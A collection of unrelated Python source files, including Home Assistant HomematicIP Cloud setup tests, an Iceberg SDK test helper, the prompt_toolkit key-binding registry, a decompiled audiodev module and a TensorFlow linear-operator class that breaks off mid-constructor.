# 2193 0.553 0.000 0.553 0.000 {numpy.core.multiarray.dot}
# 2505 0.187 0.000 0.593 0.000 round.py:144(play)
# 315 0.152 0.000 0.152 0.000 expt.py:258(discard_input_scaler)
# 29986 0.100 0.000 0.100 0.000 {numpy.core.multiarray.zeros}
# 2506 0.079 0.000 0.347 0.000 round.py:68(deal)
# 2506 0.076 0.000 0.089 0.000 random.py:277(shuffle)
# 9981 0.073 0.000 0.164 0.000 neural.py:111(play_state_repr)
# 2827 0.060 0.000 0.060 0.000 {numpy.core.multiarray.array}
# 9981 0.036 0.000 0.293 0.000 neural.py:268(play_card)
# 24974 0.035 0.000 0.035 0.000 neural.py:41(encode_categories)
# 22469 0.031 0.000 0.039 0.000 random.py:273(choice)
# 64234 0.031 0.000 0.031 0.000 neural.py:28(one_hot)
|
|
"""Test HomematicIP Cloud setup process."""
from asynctest import CoroutineMock, Mock, patch
from homematicip.base.base_connection import HmipConnectionError
from homeassistant.components.homematicip_cloud.const import (
CONF_ACCESSPOINT,
CONF_AUTHTOKEN,
DOMAIN as HMIPC_DOMAIN,
HMIPC_AUTHTOKEN,
HMIPC_HAPID,
HMIPC_NAME,
)
from homeassistant.components.homematicip_cloud.hap import HomematicipHAP
from homeassistant.config_entries import (
ENTRY_STATE_LOADED,
ENTRY_STATE_NOT_LOADED,
ENTRY_STATE_SETUP_ERROR,
ENTRY_STATE_SETUP_RETRY,
)
from homeassistant.const import CONF_NAME
from homeassistant.setup import async_setup_component
from tests.common import MockConfigEntry
async def test_config_with_accesspoint_passed_to_config_entry(hass):
"""Test that config for a accesspoint are loaded via config entry."""
entry_config = {
CONF_ACCESSPOINT: "ABC123",
CONF_AUTHTOKEN: "123",
CONF_NAME: "name",
}
# no config_entry exists
assert len(hass.config_entries.async_entries(HMIPC_DOMAIN)) == 0
    # no accesspoint exists
assert not hass.data.get(HMIPC_DOMAIN)
assert await async_setup_component(hass, HMIPC_DOMAIN, {HMIPC_DOMAIN: entry_config})
# config_entry created for access point
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
assert config_entries[0].data == {
"authtoken": "123",
"hapid": "ABC123",
"name": "name",
}
# defined access_point created for config_entry
assert isinstance(hass.data[HMIPC_DOMAIN]["ABC123"], HomematicipHAP)
async def test_config_already_registered_not_passed_to_config_entry(hass):
"""Test that an already registered accesspoint does not get imported."""
mock_config = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC123", HMIPC_NAME: "name"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config).add_to_hass(hass)
# one config_entry exists
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
assert config_entries[0].data == {
"authtoken": "123",
"hapid": "ABC123",
"name": "name",
}
    # config_entry has no unique_id
assert not config_entries[0].unique_id
entry_config = {
CONF_ACCESSPOINT: "ABC123",
CONF_AUTHTOKEN: "123",
CONF_NAME: "name",
}
assert await async_setup_component(hass, HMIPC_DOMAIN, {HMIPC_DOMAIN: entry_config})
# no new config_entry created / still one config_entry
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
assert config_entries[0].data == {
"authtoken": "123",
"hapid": "ABC123",
"name": "name",
}
    # config_entry updated with unique_id
assert config_entries[0].unique_id == "ABC123"
async def test_load_entry_fails_due_to_connection_error(hass, hmip_config_entry):
"""Test load entry fails due to connection error."""
hmip_config_entry.add_to_hass(hass)
with patch(
"homeassistant.components.homematicip_cloud.hap.AsyncHome.get_current_state",
side_effect=HmipConnectionError,
):
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
assert hass.data[HMIPC_DOMAIN][hmip_config_entry.unique_id]
assert hmip_config_entry.state == ENTRY_STATE_SETUP_RETRY
async def test_load_entry_fails_due_to_generic_exception(hass, hmip_config_entry):
"""Test load entry fails due to generic exception."""
hmip_config_entry.add_to_hass(hass)
with patch(
"homeassistant.components.homematicip_cloud.hap.AsyncHome.get_current_state",
side_effect=Exception,
):
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
assert hass.data[HMIPC_DOMAIN][hmip_config_entry.unique_id]
assert hmip_config_entry.state == ENTRY_STATE_SETUP_ERROR
async def test_unload_entry(hass):
"""Test being able to unload an entry."""
mock_config = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC123", HMIPC_NAME: "name"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config).add_to_hass(hass)
with patch("homeassistant.components.homematicip_cloud.HomematicipHAP") as mock_hap:
instance = mock_hap.return_value
instance.async_setup = CoroutineMock(return_value=True)
instance.home.id = "1"
instance.home.modelType = "mock-type"
instance.home.name = "mock-name"
instance.home.currentAPVersion = "mock-ap-version"
instance.async_reset = CoroutineMock(return_value=True)
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
assert mock_hap.return_value.mock_calls[0][0] == "async_setup"
assert hass.data[HMIPC_DOMAIN]["ABC123"]
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
assert config_entries[0].state == ENTRY_STATE_LOADED
await hass.config_entries.async_unload(config_entries[0].entry_id)
assert config_entries[0].state == ENTRY_STATE_NOT_LOADED
assert mock_hap.return_value.mock_calls[3][0] == "async_reset"
# entry is unloaded
assert hass.data[HMIPC_DOMAIN] == {}
async def test_hmip_dump_hap_config_services(hass, mock_hap_with_service):
"""Test dump configuration services."""
with patch("pathlib.Path.write_text", return_value=Mock()) as write_mock:
await hass.services.async_call(
"homematicip_cloud", "dump_hap_config", {"anonymize": True}, blocking=True
)
home = mock_hap_with_service.home
assert home.mock_calls[-1][0] == "download_configuration"
assert home.mock_calls
assert write_mock.mock_calls
async def test_setup_services_and_unload_services(hass):
"""Test setup services and unload services."""
mock_config = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC123", HMIPC_NAME: "name"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config).add_to_hass(hass)
with patch("homeassistant.components.homematicip_cloud.HomematicipHAP") as mock_hap:
instance = mock_hap.return_value
instance.async_setup = CoroutineMock(return_value=True)
instance.home.id = "1"
instance.home.modelType = "mock-type"
instance.home.name = "mock-name"
instance.home.currentAPVersion = "mock-ap-version"
instance.async_reset = CoroutineMock(return_value=True)
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
# Check services are created
hmipc_services = hass.services.async_services()[HMIPC_DOMAIN]
assert len(hmipc_services) == 8
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
await hass.config_entries.async_unload(config_entries[0].entry_id)
# Check services are removed
assert not hass.services.async_services().get(HMIPC_DOMAIN)
async def test_setup_two_haps_unload_one_by_one(hass):
"""Test setup two access points and unload one by one and check services."""
# Setup AP1
mock_config = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC123", HMIPC_NAME: "name"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config).add_to_hass(hass)
# Setup AP2
mock_config2 = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC1234", HMIPC_NAME: "name2"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config2).add_to_hass(hass)
with patch("homeassistant.components.homematicip_cloud.HomematicipHAP") as mock_hap:
instance = mock_hap.return_value
instance.async_setup = CoroutineMock(return_value=True)
instance.home.id = "1"
instance.home.modelType = "mock-type"
instance.home.name = "mock-name"
instance.home.currentAPVersion = "mock-ap-version"
instance.async_reset = CoroutineMock(return_value=True)
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
hmipc_services = hass.services.async_services()[HMIPC_DOMAIN]
assert len(hmipc_services) == 8
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 2
# unload the first AP
await hass.config_entries.async_unload(config_entries[0].entry_id)
# services still exists
hmipc_services = hass.services.async_services()[HMIPC_DOMAIN]
assert len(hmipc_services) == 8
# unload the second AP
await hass.config_entries.async_unload(config_entries[1].entry_id)
# Check services are removed
assert not hass.services.async_services().get(HMIPC_DOMAIN)
|
|
# -*- coding: utf-8 -*-
import random
from icebergsdk.resources import Brand
class IcebergObjectCreateMixin(object):
"""
    Some shortcuts to create common objects
"""
def delete_at_the_end(self, obj_to_delete):
        if obj_to_delete not in self._objects_to_delete:
self._objects_to_delete.append(obj_to_delete)
# Create Utils
def create_user_address(self):
user_address = self.api_handler.Address()
user_address.name = "Test"
user_address.first_name = self.api_handler.me().first_name
user_address.last_name = self.api_handler.me().last_name
user_address.address = "300 rue de charenton"
# user_address.address2
user_address.zipcode = "75012"
user_address.city = "Paris"
# user_address.state =
user_address.user = self.api_handler.me()
user_address.country = self.api_handler.Country.search({'code': 'FR'})[0][0]
# user_address.phone =
# user_address.digicode
# user_address.company
# user_address.floor
user_address.save()
return user_address
def create_application(self, namespace = "test-app-lib-python", name = "Test App Lib Python", contact_user = None):
new_application = self.api_handler.Application()
new_application.namespace = namespace
new_application.name = name
new_application.contact_user = contact_user or self.api_handler.User.me()
new_application.save()
return new_application
def create_merchant(self, name = "test-python-lib-store", application = None):
# self.assertNotEqual(application, None)
new_merchant = self.api_handler.Store()
new_merchant.name = name
# new_merchant.application = application
new_merchant.save()
return new_merchant
# Get Utils
def get_random_active_store(self):
"""
        Will return a random active store with active offers
"""
# Find a merchant
stores, meta = self.api_handler.Store.search({'status': "10"})
max_loop = len(stores)
store = None
while max_loop > 0:
            store = random.choice(stores)  # pick a store at random
max_loop -= 1
product_offers = store.product_offers()
if len(product_offers) > 0:
break
self.assertNotEqual(store, None)
return store
def get_random_offer(self, application=None):
"""
Will return a random active offer
"""
store_search_params = {'status': "10"} ## active stores
if application:
store_search_params['application'] = application.id ## limited to stores of given application
print "store_search_params=%s" % store_search_params
stores, meta = self.api_handler.Store.search(store_search_params)
print "stores, meta=%s, %s" % (stores, meta)
test_store = None
for store in stores:
product_offers = store.product_offers(params = {'availability': 'in_stock', 'status': 'active'})
if len(product_offers) > 0:
test_store = store
break
self.assertNotEqual(test_store, None)
max_loop = len(product_offers)
while max_loop > 0:
offer = random.choice(product_offers) # Return offer randomly
max_loop -= 1
if offer.stock > 0:
break
return offer
def get_random_sku(self):
return "test-sku-%s" % random.randint(0, 1000000000)
def create_webhook(self, application, event, url, delete_at_the_end=True, active_merchant_only=True):
webhook = self.api_handler.Webhook()
webhook.application = application
webhook.event = event
webhook.url = url
webhook.active_merchant_only = active_merchant_only
webhook.save()
print "webhook=%s" % webhook.__dict__
if delete_at_the_end:
self.delete_at_the_end(webhook)
return webhook
def create_product(self, name, description, gender, categories=None, brand=None, delete_at_the_end=True):
product = self.api_handler.Product()
product.name = name
product.description = description
product.gender = gender
product.save()
if categories:
product.categories = []
for category in categories:
if type(category) == self.api_handler.Category:
## category is already a category object
category_obj = category
else:
## category is the id
category_obj = self.api_handler.Category()
category_obj.id = category
product.categories.append(category_obj)
if brand:
if isinstance(brand, Brand):
brand_obj = brand
else:
brand_obj = self.api_handler.Brand()
brand_obj.id = brand
product.brand = brand_obj
if categories or brand:
## need to save
product.save()
if delete_at_the_end:
self.delete_at_the_end(product)
return product
def create_product_offer(self, product, merchant, sku=None, is_abstract=False, image_paths=None, delete_at_the_end=True, **kwargs):
productoffer = self.api_handler.ProductOffer()
productoffer.product = product
productoffer.merchant = merchant
productoffer.is_abstract = is_abstract
if sku is not None:
productoffer.sku = sku
for key, value in kwargs.iteritems(): ## assign other params
setattr(productoffer, key, value)
productoffer.save()
if image_paths:
for image_path in image_paths:
productoffer.add_image(image_path)
if delete_at_the_end:
self.delete_at_the_end(productoffer)
return productoffer
def create_product_variation(self, product_offer, sku, gtin13=None, delete_at_the_end=True, **kwargs):
productvariation = self.api_handler.ProductVariation()
productvariation.product_offer = product_offer
productvariation.sku = sku
if gtin13 is not None:
productvariation.gtin13 = gtin13
for key, value in kwargs.iteritems(): ## assign other params
setattr(productvariation, key, value)
productvariation.save()
if delete_at_the_end:
self.delete_at_the_end(productvariation)
return productvariation
|
|
"""
Key bindings registry.
A `Registry` object is a container that holds a list of key bindings. It has a
very efficient internal data structure for checking which key bindings apply
for a pressed key.
Typical usage::
r = Registry()
@r.add_binding(Keys.ControlX, Keys.ControlC, filter=INSERT)
def handler(event):
# Handle ControlX-ControlC key sequence.
pass
It is also possible to combine multiple registries. We do this in the default
key bindings. There are some registries that contain Emacs bindings, while
others contain the Vi bindings. They are merged together using a
`MergedRegistry`.
We also have a `ConditionalRegistry` object that can enable/disable a group of
key bindings at once.
"""
from __future__ import unicode_literals
from abc import ABCMeta, abstractmethod
from prompt_toolkit.cache import SimpleCache
from prompt_toolkit.filters import CLIFilter, to_cli_filter, Never
from prompt_toolkit.keys import Key, Keys
from six import text_type, with_metaclass
__all__ = (
'BaseRegistry',
'Registry',
'ConditionalRegistry',
'MergedRegistry',
)
class _Binding(object):
"""
(Immutable binding class.)
"""
def __init__(self, keys, handler, filter=None, eager=None, save_before=None):
assert isinstance(keys, tuple)
assert callable(handler)
assert isinstance(filter, CLIFilter)
assert isinstance(eager, CLIFilter)
assert callable(save_before)
self.keys = keys
self.handler = handler
self.filter = filter
self.eager = eager
self.save_before = save_before
def call(self, event):
return self.handler(event)
def __repr__(self):
return '%s(keys=%r, handler=%r)' % (
self.__class__.__name__, self.keys, self.handler)
class BaseRegistry(with_metaclass(ABCMeta, object)):
"""
Interface for a Registry.
"""
_version = 0 # For cache invalidation.
@abstractmethod
def get_bindings_for_keys(self, keys):
pass
@abstractmethod
def get_bindings_starting_with_keys(self, keys):
pass
# `add_binding` and `remove_binding` don't have to be part of this
# interface.
class Registry(BaseRegistry):
"""
Key binding registry.
"""
def __init__(self):
self.key_bindings = []
self._get_bindings_for_keys_cache = SimpleCache(maxsize=10000)
self._get_bindings_starting_with_keys_cache = SimpleCache(maxsize=1000)
self._version = 0 # For cache invalidation.
def _clear_cache(self):
self._version += 1
self._get_bindings_for_keys_cache.clear()
self._get_bindings_starting_with_keys_cache.clear()
def add_binding(self, *keys, **kwargs):
"""
Decorator for annotating key bindings.
:param filter: :class:`~prompt_toolkit.filters.CLIFilter` to determine
when this key binding is active.
:param eager: :class:`~prompt_toolkit.filters.CLIFilter` or `bool`.
When True, ignore potential longer matches when this key binding is
hit. E.g. when there is an active eager key binding for Ctrl-X,
execute the handler immediately and ignore the key binding for
Ctrl-X Ctrl-E of which it is a prefix.
:param save_before: Callable that takes an `Event` and returns True if
we should save the current buffer, before handling the event.
(That's the default.)
"""
filter = to_cli_filter(kwargs.pop('filter', True))
eager = to_cli_filter(kwargs.pop('eager', False))
save_before = kwargs.pop('save_before', lambda e: True)
to_cli_filter(kwargs.pop('invalidate_ui', True)) # Deprecated! (ignored.)
assert not kwargs
assert keys
assert all(isinstance(k, (Key, text_type)) for k in keys), \
'Key bindings should consist of Key and string (unicode) instances.'
assert callable(save_before)
if isinstance(filter, Never):
# When a filter is Never, it will always stay disabled, so in that case
# don't bother putting it in the registry. It will slow down every key
# press otherwise.
def decorator(func):
return func
else:
def decorator(func):
self.key_bindings.append(
_Binding(keys, func, filter=filter, eager=eager,
save_before=save_before))
self._clear_cache()
return func
return decorator
def remove_binding(self, function):
"""
Remove a key binding.
This expects a function that was given to `add_binding` method as
parameter. Raises `ValueError` when the given function was not
registered before.
"""
assert callable(function)
for b in self.key_bindings:
if b.handler == function:
self.key_bindings.remove(b)
self._clear_cache()
return
# No key binding found for this function. Raise ValueError.
raise ValueError('Binding not found: %r' % (function, ))
def get_bindings_for_keys(self, keys):
"""
Return a list of key bindings that can handle this key.
        (This also returns inactive bindings, so the `filter` still has to be
        called to check whether they apply.)
:param keys: tuple of keys.
"""
def get():
result = []
for b in self.key_bindings:
if len(keys) == len(b.keys):
match = True
any_count = 0
for i, j in zip(b.keys, keys):
if i != j and i != Keys.Any:
match = False
break
if i == Keys.Any:
any_count += 1
if match:
result.append((any_count, b))
            # Place bindings that have more 'Any' occurrences in them at the end.
result = sorted(result, key=lambda item: -item[0])
return [item[1] for item in result]
return self._get_bindings_for_keys_cache.get(keys, get)
def get_bindings_starting_with_keys(self, keys):
"""
Return a list of key bindings that handle a key sequence starting with
`keys`. (It does only return bindings for which the sequences are
longer than `keys`. And like `get_bindings_for_keys`, it also includes
inactive bindings.)
:param keys: tuple of keys.
"""
def get():
result = []
for b in self.key_bindings:
if len(keys) < len(b.keys):
match = True
for i, j in zip(b.keys, keys):
if i != j and i != Keys.Any:
match = False
break
if match:
result.append(b)
return result
return self._get_bindings_starting_with_keys_cache.get(keys, get)
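# Note (an inference from the two lookup methods above, not a comment from the
# original source): for a binding registered on (Keys.ControlX, Keys.ControlC),
# get_bindings_for_keys() only matches the full two-key sequence, while
# get_bindings_starting_with_keys((Keys.ControlX,)) reports it as a possible
# longer match, which is what allows the key processor to keep waiting for the
# next key instead of firing a shorter binding immediately.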
class _AddRemoveMixin(BaseRegistry):
"""
Common part for ConditionalRegistry and MergedRegistry.
"""
def __init__(self):
# `Registry` to be synchronized with all the others.
self._registry2 = Registry()
self._last_version = None
# The 'extra' registry. Mostly for backwards compatibility.
self._extra_registry = Registry()
def _update_cache(self):
raise NotImplementedError
    # For backwards compatibility, we allow adding bindings to both
    # ConditionalRegistry and MergedRegistry. This is, however, not the
    # recommended way. It is better to create a new registry and merge them
    # together using MergedRegistry.
def add_binding(self, *k, **kw):
return self._extra_registry.add_binding(*k, **kw)
def remove_binding(self, *k, **kw):
return self._extra_registry.remove_binding(*k, **kw)
# Proxy methods to self._registry2.
@property
def key_bindings(self):
self._update_cache()
return self._registry2.key_bindings
@property
def _version(self):
self._update_cache()
return self._last_version
def get_bindings_for_keys(self, *a, **kw):
self._update_cache()
return self._registry2.get_bindings_for_keys(*a, **kw)
def get_bindings_starting_with_keys(self, *a, **kw):
self._update_cache()
return self._registry2.get_bindings_starting_with_keys(*a, **kw)
class ConditionalRegistry(_AddRemoveMixin):
"""
Wraps around a `Registry`. Disable/enable all the key bindings according to
the given (additional) filter.::
@Condition
def setting_is_true(cli):
return True # or False
        registry = ConditionalRegistry(registry, setting_is_true)
    When new key bindings are added to this object, they are also
    enabled/disabled according to the given `filter`.
    :param registry: The `Registry` to wrap.
:param filter: `CLIFilter` object.
"""
def __init__(self, registry=None, filter=True):
registry = registry or Registry()
assert isinstance(registry, BaseRegistry)
_AddRemoveMixin.__init__(self)
self.registry = registry
self.filter = to_cli_filter(filter)
def _update_cache(self):
" If the original registry was changed. Update our copy version. "
expected_version = (self.registry._version, self._extra_registry._version)
if self._last_version != expected_version:
registry2 = Registry()
# Copy all bindings from `self.registry`, adding our condition.
for reg in (self.registry, self._extra_registry):
for b in reg.key_bindings:
registry2.key_bindings.append(
_Binding(
keys=b.keys,
handler=b.handler,
filter=self.filter & b.filter,
eager=b.eager,
save_before=b.save_before))
self._registry2 = registry2
self._last_version = expected_version
class MergedRegistry(_AddRemoveMixin):
"""
Merge multiple registries of key bindings into one.
This class acts as a proxy to multiple `Registry` objects, but behaves as
if this is just one bigger `Registry`.
:param registries: List of `Registry` objects.
"""
def __init__(self, registries):
assert all(isinstance(r, BaseRegistry) for r in registries)
_AddRemoveMixin.__init__(self)
self.registries = registries
def _update_cache(self):
"""
        If one of the original registries was changed, update our merged
        version.
"""
expected_version = (
tuple(r._version for r in self.registries) +
(self._extra_registry._version, ))
if self._last_version != expected_version:
registry2 = Registry()
for reg in self.registries:
registry2.key_bindings.extend(reg.key_bindings)
# Copy all bindings from `self._extra_registry`.
registry2.key_bindings.extend(self._extra_registry.key_bindings)
self._registry2 = registry2
self._last_version = expected_version
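# Minimal usage sketch (illustrative only; the registry names below are made up
# for the example and do not come from this module):
#
#     emacs_registry = Registry()
#     vi_registry = Registry()
#     combined = MergedRegistry([
#         emacs_registry,
#         ConditionalRegistry(vi_registry, filter=to_cli_filter(False)),
#     ])
#     # `combined` behaves like a single Registry; the Vi bindings stay
#     # disabled until the wrapped filter evaluates to True.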
|
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: audiodev.py
"""Classes for manipulating audio devices (currently only for Sun and SGI)"""
from warnings import warnpy3k
warnpy3k('the audiodev module has been removed in Python 3.0', stacklevel=2)
del warnpy3k
__all__ = [
'error', 'AudioDev']
class error(Exception):
pass
class Play_Audio_sgi:
classinited = 0
frameratelist = nchannelslist = sampwidthlist = None
def initclass(self):
import AL
        self.frameratelist = [
            (48000, AL.RATE_48000),
            (44100, AL.RATE_44100),
            (32000, AL.RATE_32000),
            (22050, AL.RATE_22050),
            (16000, AL.RATE_16000),
            (11025, AL.RATE_11025),
            (8000, AL.RATE_8000)]
        self.nchannelslist = [
            (1, AL.MONO),
            (2, AL.STEREO),
            (4, AL.QUADRO)]
        self.sampwidthlist = [
            (1, AL.SAMPLE_8),
            (2, AL.SAMPLE_16),
            (3, AL.SAMPLE_24)]
self.classinited = 1
def __init__(self):
import al
import AL
if not self.classinited:
self.initclass()
self.oldparams = []
        self.params = [AL.OUTPUT_RATE, 0]
self.config = al.newconfig()
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
if self.port:
self.stop()
if self.oldparams:
import al
import AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def wait(self):
if not self.port:
return
import time
while self.port.getfilled() > 0:
time.sleep(0.1)
self.stop()
def stop(self):
if self.port:
self.port.closeport()
self.port = None
if self.oldparams:
import al
import AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
return
def setoutrate(self, rate):
for raw, cooked in self.frameratelist:
if rate == raw:
self.params[1] = cooked
self.inited_outrate = 1
break
else:
raise error, 'bad output rate'
def setsampwidth(self, width):
for raw, cooked in self.sampwidthlist:
if width == raw:
self.config.setwidth(cooked)
self.inited_width = 1
break
else:
if width == 0:
import AL
self.inited_width = 0
self.config.setwidth(AL.SAMPLE_16)
self.converter = self.ulaw2lin
else:
raise error, 'bad sample width'
def setnchannels(self, nchannels):
for raw, cooked in self.nchannelslist:
if nchannels == raw:
self.config.setchannels(cooked)
self.inited_nchannels = 1
break
else:
raise error, 'bad # of channels'
def writeframes(self, data):
if not (self.inited_outrate and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import al
import AL
self.port = al.openport('Python', 'w', self.config)
self.oldparams = self.params[:]
al.getparams(AL.DEFAULT_DEVICE, self.oldparams)
al.setparams(AL.DEFAULT_DEVICE, self.params)
if self.converter:
data = self.converter(data)
self.port.writesamps(data)
def getfilled(self):
if self.port:
return self.port.getfilled()
else:
return 0
def getfillable(self):
if self.port:
return self.port.getfillable()
else:
return self.config.getqueuesize()
def ulaw2lin(self, data):
import audioop
return audioop.ulaw2lin(data, 2)
class Play_Audio_sun:
def __init__(self):
self.outrate = 0
self.sampwidth = 0
self.nchannels = 0
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
self.stop()
def setoutrate(self, rate):
self.outrate = rate
self.inited_outrate = 1
def setsampwidth(self, width):
self.sampwidth = width
self.inited_width = 1
def setnchannels(self, nchannels):
self.nchannels = nchannels
self.inited_nchannels = 1
def writeframes(self, data):
if not (self.inited_outrate and self.inited_width and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import sunaudiodev
import SUNAUDIODEV
self.port = sunaudiodev.open('w')
info = self.port.getinfo()
info.o_sample_rate = self.outrate
info.o_channels = self.nchannels
if self.sampwidth == 0:
info.o_precision = 8
                info.o_encoding = SUNAUDIODEV.ENCODING_ULAW
else:
info.o_precision = 8 * self.sampwidth
info.o_encoding = SUNAUDIODEV.ENCODING_LINEAR
self.port.setinfo(info)
if self.converter:
data = self.converter(data)
self.port.write(data)
def wait(self):
if not self.port:
return
self.port.drain()
self.stop()
def stop(self):
if self.port:
self.port.flush()
self.port.close()
self.port = None
return
def getfilled(self):
if self.port:
return self.port.obufcount()
else:
return 0
def AudioDev():
try:
import al
except ImportError:
try:
import sunaudiodev
return Play_Audio_sun()
except ImportError:
try:
import Audio_mac
except ImportError:
raise error, 'no audio device'
else:
return Audio_mac.Play_Audio_mac()
else:
return Play_Audio_sgi()
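# Note (descriptive comment added for clarity): AudioDev() probes the platform
# modules in order (SGI "al", then Sun "sunaudiodev", then Macintosh
# "Audio_mac") and raises `error` only when none of them can be imported.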
def test(fn=None):
import sys
if sys.argv[1:]:
fn = sys.argv[1]
else:
fn = 'f:just samples:just.aif'
import aifc
af = aifc.open(fn, 'r')
print fn, af.getparams()
p = AudioDev()
p.setoutrate(af.getframerate())
p.setsampwidth(af.getsampwidth())
p.setnchannels(af.getnchannels())
BUFSIZ = af.getframerate() / af.getsampwidth() / af.getnchannels()
while 1:
data = af.readframes(BUFSIZ)
if not data:
break
print len(data)
p.writeframes(data)
p.wait()
if __name__ == '__main__':
test()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Composes one or more `LinearOperators`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.linalg.python.ops import linear_operator
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
__all__ = ["LinearOperatorComposition"]
class LinearOperatorComposition(linear_operator.LinearOperator):
"""Composes one or more `LinearOperators`.
This operator composes one or more linear operators `[op1,...,opJ]`,
building a new `LinearOperator` with action defined by:
```
  op_composed(x) := op1(op2(...(opJ(x))...))
```
If `opj` acts like [batch] matrix `Aj`, then `op_composed` acts like the
[batch] matrix formed with the multiplication `A1 A2...AJ`.
If `opj` has shape `batch_shape_j + [M_j, N_j]`, then we must have
`N_j = M_{j+1}`, in which case the composed operator has shape equal to
`broadcast_batch_shape + [M_1, N_J]`, where `broadcast_batch_shape` is the
mutual broadcast of `batch_shape_j`, `j = 1,...,J`, assuming the intermediate
batch shapes broadcast. Even if the composed shape is well defined, the
composed operator's methods may fail due to lack of broadcasting ability in
the defining operators' methods.
```python
# Create a 2 x 2 linear operator composed of two 2 x 2 operators.
operator_1 = LinearOperatorFullMatrix([[1., 2.], [3., 4.]])
operator_2 = LinearOperatorFullMatrix([[1., 0.], [0., 1.]])
operator = LinearOperatorComposition([operator_1, operator_2])
operator.to_dense()
==> [[1., 2.]
[3., 4.]]
operator.shape
==> [2, 2]
operator.log_abs_determinant()
==> scalar Tensor
x = ... Shape [2, 4] Tensor
operator.matmul(x)
==> Shape [2, 4] Tensor
# Create a [2, 3] batch of 4 x 5 linear operators.
matrix_45 = tf.random_normal(shape=[2, 3, 4, 5])
  operator_45 = LinearOperatorFullMatrix(matrix_45)
# Create a [2, 3] batch of 5 x 6 linear operators.
matrix_56 = tf.random_normal(shape=[2, 3, 5, 6])
operator_56 = LinearOperatorFullMatrix(matrix_56)
# Compose to create a [2, 3] batch of 4 x 6 operators.
operator_46 = LinearOperatorComposition([operator_45, operator_56])
# Create a shape [2, 3, 6, 2] vector.
x = tf.random_normal(shape=[2, 3, 6, 2])
  operator_46.matmul(x)
==> Shape [2, 3, 4, 2] Tensor
```
#### Performance
The performance of `LinearOperatorComposition` on any operation is equal to
the sum of the individual operators' operations.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
operators,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=None,
name=None):
r"""Initialize a `LinearOperatorComposition`.
`LinearOperatorComposition` is initialized with a list of operators
`[op_1,...,op_J]`. For the `matmul` method to be well defined, the
composition `op_i.matmul(op_{i+1}(x))` must be defined. Other methods have
similar constraints.
Args:
operators: Iterable of `LinearOperator` objects, each with
the same `dtype` and composable shape.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose.
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix\
#Extension_for_non_symmetric_matrices
is_square: Expect that this operator acts like square [batch] matrices.
name: A name for this `LinearOperator`. Default is the individual
operators names joined with `_o_`.
Raises:
TypeError: If all operators do not have the same `dtype`.
ValueError: If `operators` is empty.
"""
# Validate operators.
check_ops.assert_proper_iterable(operators)
operators = list(operators)
if not operators:
raise ValueError(
"Expected a non-empty list of operators. Found: %s" % operators)
self._operators = operators
# Validate dtype.
dtype = operators[0].dtype
for operator in operators:
if operator.dtype != dtype:
name_type = (str((o.name, o.dtype)) for o in operators)
raise TypeError(
"Expected all operators to have the same dtype. Found %s"
% " ".join(name_type))
# Auto-set and check hints.
if all(operator.is_non_singular for operator in operators):
if is_non_singular is False:
raise ValueError(
"The composition of non-singular operators is always non-singular.")
is_non_singular = True
# Initialization.
graph_parents = []
for operator in operators:
graph_parents.extend(operator.graph_parents)
